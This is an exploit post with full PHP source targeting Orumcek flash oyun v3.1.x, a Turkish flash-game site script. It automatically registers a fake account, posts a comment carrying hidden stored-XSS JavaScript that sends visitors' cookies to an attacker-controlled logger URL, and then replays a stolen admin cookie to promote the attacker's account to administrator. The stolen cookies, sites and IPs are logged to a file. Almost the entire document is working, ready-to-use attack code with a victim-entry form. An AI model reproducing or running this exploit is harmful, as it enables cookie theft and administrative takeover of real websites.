# Exploit Title: rmcek flash oyun v3.1.1 & v3.1.0 XSS & CSRF Vulnerability # Google Dork: &#169;2010 - 2013 cretsiz Flash Oyun Scripti kullan&#305;larak haz&#305;rlanm&#305;t&#305;r. # Date: 08.06.2013 # Exploit Author: FreWaL | frewal@frewal.net # Vendor Homepage: http://www.orumcekoyun.com/ # Software Link: http://orumcekoyun.com/surumler.html # Version: v3.1.1(latest) & v3.1.0 ########################################################## # Exploit Video : http://www.youtube.com/watch?v=mu4uFBhhv68&feature=youtu.be ########################################################## # Dr.Ly0n & FreWaL --> http://frewals.blogspot.com ########################################################## Create one file name is : yazdim.html chmod 777 . its Exploit function automatic register website and automatic craate exploit and automatic send ... its exploit & sniffer.. Please follow the exploit's video ########################################################## Bir dosya olusturun ve adini : yazdim.html yapin chmod 777 verin. Bu exploitin islevi otomatik kayit olur otomatik exploiti olusturur ve admine gonderir. bu hem exploit hemde sniffer gorevi gorur. Lutfen exploit videosunu izleyiniz. ########################################################## its video gir.php exploit ... <?php /* Coded by FreWaL & Dr.Ly0n For Angelz Co. http://frewals.blogspot.com */ $cookie = $_GET['fw']; $u1 = $_GET['u1']; $u2 = $_GET['u2']; $ip = $_SERVER['REMOTE_ADDR']; $ilk = explode('&',$cookie); $sonx = $ilk[1]; $son1 = $ilk[2]; $bolbi = explode("|",urldecode($ilk[0])); $tamurl = explode("http://",$bolbi[0]); $tamurlx = explode("/",$tamurl[1]); $tamurlz = $tamurlx[0]; $kids = explode("=",$sonx); $kidi = $kids[1]; $ozbo = explode("panel",$bolbi[0]); $sifirURL = trim($ozbo[0]); $loggerURLz = ''; function exploitUygula($getirverbaga, $logURL){ $dosya = 'http://'.$getirverbaga.'/panel/js/tiny_mce/tiny_mce.js'; $kontrol = @fopen($dosya , "r"); if ($kontrol) { $rakam = rand(100,999); $kadi = 'ayse'.$rakam ; $mail = 'ayse'.$rakam.'%40hotmail.com'; $pass = 'frewal'; $fwdr1 = curl_init(); curl_setopt($fwdr1, CURLOPT_URL, 'http://'.$getirverbaga.'/uye/index.php?do=register'); curl_setopt($fwdr1, CURLOPT_POSTFIELDS,'isim=Ayse&soyisim=Sonmez&gun=1&ay=1&yil=1992&email='.$mail.'&kadi='.$kadi.'&password='.$pass.'&cpassword='.$pass.'&capchacevap=40&Submit=Kabul+%2F+%C3%9Cye+Ol'); curl_setopt($fwdr1, CURLOPT_POST, 1); curl_setopt($fwdr1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)"); curl_setopt($fwdr1, CURLOPT_RETURNTRANSFER, 1); curl_setopt($fwdr1, CURLOPT_REFERER, 'http://'.$getirverbaga.'/uye/index.php?do=register'); curl_setopt($fwdr1, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($fwdr1, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($fwdr1, CURLOPT_SSL_VERIFYHOST, 0); $uyelik=curl_exec($fwdr1); curl_close($fwdr1); $postx = 'kadi='.$kadi.'&password='.$pass.'&Submit=G%C4%B0R%C4%B0%C5%9E+YAP'; $fwdr2 = curl_init(); curl_setopt($fwdr2, CURLOPT_URL, 'http://'.$getirverbaga.'/uye/index.php?do=login'); //curl_setopt($fwdr2, CURLOPT_URL, 'http://'.$getirverbaga.'/uye/do-login.php?kadi='.$kadi.'&sifre='.$pass.''); curl_setopt($fwdr2, CURLOPT_POSTFIELDS,$postx); curl_setopt($fwdr2, CURLOPT_POST, 1); curl_setopt($fwdr2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)"); curl_setopt($fwdr2, CURLOPT_HEADER, 1); curl_setopt($fwdr2, CURLOPT_RETURNTRANSFER, 1); curl_setopt($fwdr2, CURLOPT_REFERER, 'http://'.$getirverbaga.'/uye/do-login.php'); curl_setopt($fwdr2, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($fwdr2, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($fwdr2, CURLOPT_SSL_VERIFYHOST, 0); $uyelik1=curl_exec($fwdr2); curl_close($fwdr2); //echo $uyelik1.'<br>'; $ids = explode("ORUMCEK_MEMBER_ID=",$uyelik1); $soid = explode(";",end($ids)); $hashi = explode("ORUMCEK_HASH=",$uyelik1); $hashi1 = explode(";",end($hashi)); $ORUMCEK_MEMBER_ID = trim($soid[0]); $ORUMCEK_ADMIN = '0'; $ORUMCEK_LOGIN_NAME = $kadi; $ORUMCEK_HASH = trim($hashi1[0]); $ORUMCEK_PASSWD = md5($pass); $cookies = 'ORUMCEK_MEMBER_ID='.$ORUMCEK_MEMBER_ID.'; ORUMCEK_ADMIN='.$ORUMCEK_ADMIN.'; ORUMCEK_LOGIN_NAME='.$ORUMCEK_LOGIN_NAME.'; ORUMCEK_HASH='.$ORUMCEK_HASH.'; ORUMCEK_PASSWD='.$ORUMCEK_PASSWD.''; echo $cookies.'<br>'; echo '-> islem tamamlandi !! -> complete!!'; $postverisi = 'yorumekle=yorumekle&oyunid=1&yorumotomatikonay=0&capchacevap=7&yorum=%3Cp%3EBence+s%26uuml%3Bper+oyun+herkese+tavsiye+ediyorum!+te%C5%9Fekk%26uuml%3Brler+admin...%3C%2Fp%3E%0D%0A%3Cdiv+style%3D%22display%3A+none%3B%22%3E%3Ciframe+id%3D%22iframe_ooyun%22+frameborder%3D%22100%22+scrolling%3D%22no%22+width%3D%220%22+height%3D%220%22%3E%3C%2Fiframe%3E%3C%2Fdiv%3E%0D%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E%2F%2F+%3C!%5BCDATA%5B%0D%0Avar++urlMbenim+%3D+%22'.$logURL.'%3Ffw%3D%22%3B%0D%0A%09var+data+%3D+escape(document.URL)+%2B+%22%7C%22+%2B+escape(document.cookie)+%2B+%22%26kidi%3D'.$ORUMCEK_MEMBER_ID.'%26kadi%3D'.$ORUMCEK_LOGIN_NAME.'%22%3B%0D%0A++++document.getElementById(%22iframe_ooyun%22).src+%3D+urlMbenim+%2B+escape(data)%3B%0D%0A%2F%2F+%5D%5D%3E%3C%2Fscript%3E'; $fwdrsn = curl_init(); curl_setopt($fwdrsn, CURLOPT_URL, 'http://'.$getirverbaga.'/uye/uyeislem.php'); curl_setopt($fwdrsn, CURLOPT_POSTFIELDS,$postverisi); curl_setopt($fwdrsn, CURLOPT_POST, 1); curl_setopt($fwdrsn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)"); curl_setopt($fwdrsn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($fwdrsn, CURLOPT_REFERER, 'http://'.$getirverbaga.'/uye/uyeislem.php'); curl_setopt($fwdrsn, CURLOPT_HTTPHEADER, array("Content-Type: application/x-www-form-urlencoded; charset=UTF-8","Cookie: $cookies")); curl_setopt($fwdrsn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($fwdrsn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($fwdrsn, CURLOPT_SSL_VERIFYHOST, 0); $gelss=curl_exec($fwdrsn); curl_close($fwdrsn); ################################# } else { echo "Bu versiyon bu acik icin uyumlu degildir !! , This version is not compatible to the open"; } ################################# } if($cookie != ""){ $gelss = file_get_contents('yazdim.html'); if(strstr($gelss,$tamurlz)){ //echo 'var'; }else{ $fwdr = curl_init(); curl_setopt($fwdr, CURLOPT_URL, $sifirURL.'/panel/islemler.php?islem=uye_admin&uyeid='.$kidi.''); curl_setopt($fwdr, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)"); curl_setopt($fwdr, CURLOPT_RETURNTRANSFER, 1); curl_setopt($fwdr, CURLOPT_REFERER, $sifirURL.'/panel/islemler.php?islem=uye_admin&uyeid='.$kidi.''); curl_setopt($fwdr, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded','Cookie: '.trim($bolbi[1]).'')); curl_setopt($fwdr, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($fwdr, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($fwdr, CURLOPT_SSL_VERIFYHOST, 0); $gel=curl_exec($fwdr); curl_close($fwdr); $frewalgelen=fopen("yazdim.html","a"); fwrite($frewalgelen,'<hr color=#000000;> <u><font face="verdana" size="-2">Cookiler&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </font></u><font face=verdana size=-2> <u>:</u> <b>'.$bolbi[1].'</b><br> <u>Site&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; :</u> <b>'.$bolbi[0].'</b></br> <u>Senin Ekledigin Admin :</u> <b>Your UserID-UserName->'.$sonx.'-'.$son1.' Default Sifre( Password ) : frewal</b></br> <u>IP Adresi&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; :</u> <b>'.$ip.'</b><br> <hr color=#000000;> </font>'); } }else{ echo ' <br>ornek hedef / sample viktim : www.google.com/orumcekoyunpath<br> <br>ornek log dosyasi / sample LogURL : http://asdf.com/log.php<br> <form method="GET" action=""> <p>Victim Site : <input type="text" name="u1" value="" size="47"></p> <p>Logger URL :<input type="text" name="u2" value="'.$loggerURLz.'" size="47"></p> <p><input type="submit" value="Pompala | Sennnnddd :))" name="B1"></p> </form> '; } if($u1 != ""){ echo exploitUygula($u1, $u2); } ?>